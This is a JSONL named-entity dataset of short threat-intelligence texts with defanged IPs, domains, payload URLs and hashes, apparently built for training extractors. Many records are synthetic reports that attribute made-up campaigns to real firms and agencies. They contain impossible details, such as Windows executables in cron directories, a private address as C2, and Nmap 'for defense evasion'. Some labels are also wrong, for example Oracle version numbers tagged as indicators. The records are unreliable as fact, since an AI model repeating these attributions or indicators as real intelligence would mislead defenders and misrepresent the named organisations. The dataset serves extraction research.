{"text": "Artifact Analysis for NjRAT campaign:\nStage 1 dropper at C:\\Windows\\System32\\csrss.exe - MD5: 1fec74d50de58bdaa03b28a52d7b29b3\nStage 2 loader at /etc/cron.d/helper.sh - SHA256: 0a94b8cce0388d2ba2832a83b87e5e694628c8d1d2c7e888cb31d64203d59abb\nFinal payload at C:\\Users\\Public\\Documents\\sam.hive - SHA256: e880b0d1e76974085e371144c48e8030f93198e391eea4cb6265e0664a0690bf\nExfiltration module - SHA1: b3a25cf49a4e4549f624c6671e3edc3eb6eda6ef\nAll stages communicated with 172[.]200[.]52[.]112. Hashcat signatures detected in Stage 2.", "spans": {"Malware: NjRAT": [[22, 27]], "Indicator: 1fec74d50de58bdaa03b28a52d7b29b3": [[94, 126]], "Indicator: 0a94b8cce0388d2ba2832a83b87e5e694628c8d1d2c7e888cb31d64203d59abb": [[177, 241]], "Indicator: e880b0d1e76974085e371144c48e8030f93198e391eea4cb6265e0664a0690bf": [[304, 368]], "Indicator: b3a25cf49a4e4549f624c6671e3edc3eb6eda6ef": [[397, 437]], "Indicator: 172.200.52.112": [[467, 487]]}, "info": {"id": "synth_v2_01862", "source": "defanged_augment"}}
{"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER[.]DLL \" to disguise it as the DLL for the ASP[ . ]NET ISAPI Filter .", "spans": {"Indicator: ASPNET_FILTER.DLL": [[211, 230]], "Indicator: ASP.NET ISAPI Filter": [[267, 291]]}, "info": {"id": "cyberner_stix_train_000744", "source": "defanged_augment"}}
{"text": "Blog Post by ESET Research: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-22601 against Windows 11 deployments. The initial access vector involves spear-phishing emails from alert@account-update[.]xyz delivering Ryuk. Post-compromise, the attackers deploy IcedID and use PsExec for reconnaissance. C2 infrastructure includes 10 [ . ] 243 [ . ] 168 [ . ] 49 and cdnsecure[.]live. A staging server at hxxps://portalcache[ . ]info/assets/js/payload.js hosts additional tooling. Key artifact: /tmp/payload.bin (SHA1: 3dc28f2fd02408ac40c9aa5d3c1c44aa207aa25d).", "spans": {"Organization: ESET Research": [[13, 26]], "Vulnerability: CVE-2022-22601": [[133, 147]], "System: Windows 11": [[156, 166]], "Indicator: alert@account-update.xyz": [[242, 268]], "Malware: Ryuk": [[280, 284]], "Malware: IcedID": [[324, 330]], "Indicator: 10.243.168.49": [[393, 424]], "Indicator: cdnsecure.live": [[429, 445]], "Indicator: https://portalcache.info/assets/js/payload.js": [[467, 516]], "Indicator: 3dc28f2fd02408ac40c9aa5d3c1c44aa207aa25d": [[581, 621]]}, "info": {"id": "synth_v2_01597", "source": "defanged_augment"}}
{"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . Payload Samples ( Win32/Winnti[.]AG ) Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": {"Organization: energy": [[284, 290]], "Organization: government": [[293, 303]], "Organization: technology sectors": [[310, 328]], "Indicator: Win32/Winnti.AG": [[414, 431]]}, "info": {"id": "cyberner_stix_train_007800", "source": "defanged_augment"}}
{"text": "Also , we found the IP address 185[.]25[.]50[.]93 hosting C2 services for a Delphi backdoor that ESET ’s report states is the final stage payload for these attacks .", "spans": {"Indicator: 185.25.50.93": [[31, 49]], "Organization: ESET": [[97, 101]]}, "info": {"id": "cyberner_stix_train_002223", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Lumma Stealer (SHA256: ad94756b526476b72d2716ad80a02096f808456e7ba6c1592619e8e73ec49926). Upon execution on VMware ESXi, the sample creates C:\\ProgramData\\lsass.dmp and injects into legitimate processes. Network analysis shows beaconing to 177 [ . ] 65 [ . ] 94 [ . ] 209 every 60 seconds and DNS queries to data-login[.]club. The second stage was fetched from hxxps://data-data[.]club/assets/js/payload.js and written to C:\\Windows\\System32\\runtime.dll. The payload uses Nmap-style techniques for defense evasion. A secondary hash (SHA1: 4d3a6e8b780782031ddaac7a4c1a742c3da7c1e0) was extracted from the unpacked payload.", "spans": {"Malware: Lumma Stealer": [[25, 38]], "Indicator: ad94756b526476b72d2716ad80a02096f808456e7ba6c1592619e8e73ec49926": [[48, 112]], "System: VMware ESXi": [[133, 144]], "Indicator: 177.65.94.209": [[265, 296]], "Indicator: data-login.club": [[333, 350]], "Indicator: hxxps://data-data.club/assets/js/payload.js": [[386, 431]], "Indicator: 4d3a6e8b780782031ddaac7a4c1a742c3da7c1e0": [[564, 604]]}, "info": {"id": "synth_v2_00631", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-30622 is a critical remote code execution affecting Windows Server 2019. Google TAG confirmed active exploitation by Granite Typhoon in the wild. Exploitation delivers Lumma Stealer (SHA1: 0a013cec2d748bb8c192917583bfb522c6fa5953) which is dropped to /usr/local/bin/sam.hive. The exploit payload is hosted at hxxp://storage-cloud[.]live/secure/token and communicates to 195[.]25[.]40[.]82 for C2.", "spans": {"Vulnerability: CVE-2024-30622": [[24, 38]], "Vulnerability: remote code execution": [[53, 74]], "System: Windows Server 2019": [[85, 104]], "Organization: Google TAG": [[106, 116]], "Malware: Lumma Stealer": [[201, 214]], "Indicator: 0a013cec2d748bb8c192917583bfb522c6fa5953": [[222, 262]], "Indicator: hxxp://storage-cloud.live/secure/token": [[342, 382]], "Indicator: 195.25.40.82": [[403, 421]]}, "info": {"id": "synth_v2_00793", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from noreply@secure-verify[.]net and noreply@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxps://gatewaysync[.]cc/download/update.exe which hosted a credential harvesting page on syncbackup[ . ]top. A secondary link hxxp://synccache[.]link/login delivered Dridex (SHA256: e24013265f68e863b0f7b101cf166fb0b86d57885f51f5a46f8dcb0065186697). The malware was saved to C:\\Users\\Public\\Documents\\implant.so and established C2 with 199[.]100[.]41[.]136.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: noreply@secure-verify.net": [[103, 130]], "Indicator: https://gatewaysync.cc/download/update.exe": [[221, 265]], "Indicator: syncbackup.top": [[311, 329]], "Indicator: hxxp://synccache.link/login": [[348, 377]], "Malware: Dridex": [[388, 394]], "Indicator: e24013265f68e863b0f7b101cf166fb0b86d57885f51f5a46f8dcb0065186697": [[404, 468]], "Indicator: 199.100.41.136": [[557, 577]], "Indicator: secure-verify.net": [[143, 164]]}, "info": {"id": "synth_v2_00923", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: SystemBC (SHA1: 277812d1f47ed2c8f9e023e478e7900eebd309f4). Upon execution on Progress Telerik, the sample creates /dev/shm/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 218[.]30[.]242[.]64 every 60 seconds and DNS queries to update-storage[.]tech. The second stage was fetched from hxxps://edgelogin[.]link/secure/token and written to /tmp/runtime.dll. The payload uses Merlin-style techniques for defense evasion. A secondary hash (SHA256: fe846ae4f5f4e5940700d391463685f3027f767d399237317b20ca43055860bc) was extracted from the unpacked payload.", "spans": {"Malware: SystemBC": [[25, 33]], "Indicator: 277812d1f47ed2c8f9e023e478e7900eebd309f4": [[41, 81]], "System: Progress Telerik": [[102, 118]], "Indicator: 218.30.242.64": [[236, 255]], "Indicator: update-storage.tech": [[292, 313]], "Indicator: https://edgelogin.link/secure/token": [[349, 386]], "Indicator: fe846ae4f5f4e5940700d391463685f3027f767d399237317b20ca43055860bc": [[508, 572]]}, "info": {"id": "synth_v2_00557", "source": "defanged_augment"}}
{"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure – both 1dnscontrol[.]com and the legitimate websites containing the rogue code – were taken offline . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": {"Organization: FireEye": [[0, 7]], "Indicator: Microsoft ActiveMime file": [[386, 411]], "Indicator: 1dnscontrol.com": [[217, 234]]}, "info": {"id": "cyberner_stix_train_005422", "source": "defanged_augment"}}
{"text": "A nubmer of downloaders installing further malware from hxxp://mondaynightfundarts[[ . ]]com/images/Nu48djdi.zip", "spans": {"Malware: downloaders": [[12, 23]], "Malware: malware": [[43, 50]], "Indicator: http://mondaynightfundarts[.": [[56, 88]]}, "info": {"id": "cyner2_train_006864", "source": "defanged_augment"}}
{"text": "Secureworks published a threat intelligence report linking UNC2452 to a new campaign exploiting CVE-2020-24328 in Fortinet FortiGate. The attackers deployed PikaBot via Burp Suite, establishing C2 communication with 113[.]5[.]103[.]218 and cdn-mail[ . ]xyz. A secondary payload was downloaded from hxxp://secure-api[.]info/secure/token. The malware binary (SHA1: f6ed137f1afcbb33e10792625b45a449a4f9dafa) was dropped to C:\\Users\\admin\\Desktop\\lsass.dmp. Phishing emails were sent from notification@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 50[.]17[.]118[.]158.", "spans": {"Organization: Secureworks": [[0, 11]], "Vulnerability: CVE-2020-24328": [[96, 110]], "System: Fortinet FortiGate": [[114, 132]], "Malware: PikaBot": [[157, 164]], "Indicator: 113.5.103.218": [[216, 235]], "Indicator: cdn-mail.xyz": [[240, 256]], "Indicator: http://secure-api.info/secure/token": [[298, 335]], "Indicator: f6ed137f1afcbb33e10792625b45a449a4f9dafa": [[363, 403]], "Indicator: notification@login-portal.tech": [[485, 517]], "Indicator: 50.17.118.158": [[583, 602]]}, "info": {"id": "synth_v2_00163", "source": "defanged_augment"}}
{"text": "Filename : ntslwin[.]exe MD5 : 7e67122d3a052e4755b02965e2e56a2e Filename : ~de03fc12a[ . ]docm MD5 : 9d703d31795bac83c4dd90527d149796 . templates[.]dotm dropped the following :", "spans": {"Indicator: ntslwin.exe": [[11, 24]], "Indicator: 7e67122d3a052e4755b02965e2e56a2e": [[31, 63]], "Indicator: ~de03fc12a.docm": [[75, 94]], "Indicator: 9d703d31795bac83c4dd90527d149796": [[101, 133]], "Indicator: templates.dotm": [[136, 152]]}, "info": {"id": "cyberner_stix_train_003610", "source": "defanged_augment"}}
{"text": "Composer is a dependency manager for PHP. URLs for Mercurial repositories in the root composer.json and package source download URLs are not sanitized correctly. Specifically crafted URL values allow code to be executed in the HgDriver if hg/Mercurial is installed on the system. The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins. The main impact is to services passing user input to Composer, including Packagist[.]org and Private Packagist. This allowed users to trigger remote code execution. The vulnerability has been patched on Packagist[.]org and Private Packagist within 12h of receiving the initial vulnerability report and based on a review of logs, to the best of our knowledge, was not abused by anyone. Other services/tools using VcsRepository/VcsDriver or derivatives may also be vulnerable and should upgrade their composer/composer dependency immediately. Versions 1.10.22 and 2.0.13 include patches for this issue.", "spans": {"Indicator: Packagist.org": [[635, 650], [765, 780]], "System: PHP": [[37, 40]], "Vulnerability: remote code execution": [[704, 725]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29472"}}
{"text": "The file is named netwf[ . ]dat .", "spans": {"Indicator: netwf.dat": [[18, 31]]}, "info": {"id": "cyberner_stix_train_002267", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 60 [ . ] 148 [ . ] 77, the CISA IR team identified RedLine Stealer running as /dev/shm/update.dll. The threat actor, believed to be Kimsuky, used Hashcat for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to cloudbackup[ . ]dev and relay-static[ . ]live. The initial dropper (SHA1: 3a39377afe1bac8f0be98e6d37fd4147cc9cff79) was delivered via a phishing email from ceo@mail-service[.]info. A second C2 node was observed at 76[.]135[.]109[.]1, with a persistence mechanism writing to /etc/cron.d/svchost.exe.", "spans": {"Indicator: 192.60.148.77": [[64, 95]], "Organization: CISA": [[101, 105]], "Malware: RedLine Stealer": [[125, 140]], "Indicator: cloudbackup.dev": [[316, 335]], "Indicator: relay-static.live": [[340, 361]], "Indicator: 3a39377afe1bac8f0be98e6d37fd4147cc9cff79": [[390, 430]], "Indicator: ceo@mail-service.info": [[472, 495]], "Indicator: 76.135.109.1": [[530, 548]]}, "info": {"id": "synth_v2_00346", "source": "defanged_augment"}}
{"text": "The domain on this campaign was registered on Jan. 19 , 2019 . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions . OceanLotus : worker[ . ]baraeme[ . ]com:8888 11b4 . The Platform can look for indicators across file attachments , embedded links , and more and provides inplatform scoring .", "spans": {"Organization: MSPs": [[170, 174]], "Organization: institutions": [[264, 276]], "Indicator: worker.baraeme.com:8888": [[292, 323]]}, "info": {"id": "cyberner_stix_train_006746", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Microsoft MSRC identified a large-scale phishing operation. Emails originated from it@login-portal[.]tech and helpdesk@identity-verify[.]cc, spoofing legitimate services. Victims were directed to hxxp://securebackup[.]dev/portal/verify which hosted a credential harvesting page on edge-cache[ . ]club. A secondary link hxxp://gatewaystorage[.]top/secure/token delivered FormBook (SHA1: 3a9af2d26d0ab2db5d2eaeb9985df6ea912a402a). The malware was saved to /opt/app/bin/helper.sh and established C2 with 172[.]103[.]198[.]127.", "spans": {"Organization: Microsoft MSRC": [[26, 40]], "Indicator: it@login-portal.tech": [[109, 131]], "Indicator: helpdesk@identity-verify.cc": [[136, 165]], "Indicator: http://securebackup.dev/portal/verify": [[222, 261]], "Indicator: edge-cache.club": [[307, 326]], "Indicator: hxxp://gatewaystorage.top/secure/token": [[345, 385]], "Malware: FormBook": [[396, 404]], "Indicator: 3a9af2d26d0ab2db5d2eaeb9985df6ea912a402a": [[412, 452]], "Indicator: 172.103.198.127": [[527, 548]]}, "info": {"id": "synth_v2_01044", "source": "defanged_augment"}}
{"text": "This High severity Remote Code Execution (RCE) vulnerability was introduced in version 2.1.0 of Confluence Data Center and Server.\n\nRemote Code Execution (RCE) vulnerability, with a CVSS Score of 8.3 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H allows an unauthenticated attacker to remotely expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.\n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\n\n* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release\n* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release\n* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release\n\nSee the release notes (hxxps://confluence[ . ]atlassian[ . ]com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (hxxps://www[.]atlassian[.]com/software/confluence/download-archives).", "spans": {"Indicator: https://confluence.atlassian.com/doc/confluence-release-notes-327.html": [[1013, 1091]], "Indicator: https://www.atlassian.com/software/confluence/download-archives": [[1194, 1261]], "Organization: Atlassian": [[504, 513]], "Vulnerability: Remote Code Execution": [[19, 40], [132, 153]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-21672"}}
{"text": "Artifact Analysis for Raccoon Stealer campaign:\nStage 1 dropper at /tmp/shell.php - MD5: 6810d117f26a0e06ab15cd907e92f29b\nStage 2 loader at C:\\Users\\admin\\Downloads\\helper.sh - SHA1: a481a934c600bf7e95fbc6a1d4336fe03a6da4fc\nFinal payload at C:\\ProgramData\\loader.exe - SHA256: a7b61940ecb64720bb7c3d786d5f589a429a5792dcd6ef3cb171392161e11587\nExfiltration module - MD5: ee6b0481fbd5374be860c7f5598ed0e4\nAll stages communicated with 192 [ . ] 43 [ . ] 13 [ . ] 140. Brute Ratel signatures detected in Stage 2.", "spans": {"Malware: Raccoon Stealer": [[22, 37]], "Indicator: 6810d117f26a0e06ab15cd907e92f29b": [[89, 121]], "Indicator: a481a934c600bf7e95fbc6a1d4336fe03a6da4fc": [[183, 223]], "Indicator: a7b61940ecb64720bb7c3d786d5f589a429a5792dcd6ef3cb171392161e11587": [[277, 341]], "Indicator: ee6b0481fbd5374be860c7f5598ed0e4": [[369, 401]], "Indicator: 192.43.13.140": [[431, 462]]}, "info": {"id": "synth_v2_01881", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]110[.]239[.]210, the FireEye IR team identified IcedID running as C:\\Windows\\System32\\loader.exe. The threat actor, believed to be Ember Bear, used BloodHound for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to cache-node[ . ]io and backuprelay[.]top. The initial dropper (SHA256: 90520882cecff2f4351728e80a1323e79e4f83f516caaafce2b446cb04e29bf7) was delivered via a phishing email from it@identity-verify[ . ]cc. A second C2 node was observed at 49[.]249[.]53[.]88, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\payload.bin.", "spans": {"Indicator: 192.110.239.210": [[64, 85]], "Organization: FireEye": [[91, 98]], "Malware: IcedID": [[118, 124]], "Indicator: cache-node.io": [[321, 338]], "Indicator: backuprelay.top": [[343, 360]], "Indicator: 90520882cecff2f4351728e80a1323e79e4f83f516caaafce2b446cb04e29bf7": [[391, 455]], "Indicator: it@identity-verify.cc": [[497, 522]], "Indicator: 49.249.53.88": [[557, 575]]}, "info": {"id": "synth_v2_00392", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: Authentication Engine). Supported versions that are affected are 11[.]1[.]2[.]3.0 and 12[.]2[.]1[.]3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Access Manager accessible data as well as unauthorized read access to a subset of Oracle Access Manager accessible data. CVSS 3.0 Base Score 4.6 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N).", "spans": {"Indicator: 11.1.2.3": [[156, 170]], "Indicator: 12.2.1.3": [[177, 191]], "Organization: Oracle": [[21, 27], [54, 60], [302, 308], [520, 526], [609, 615]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2740"}}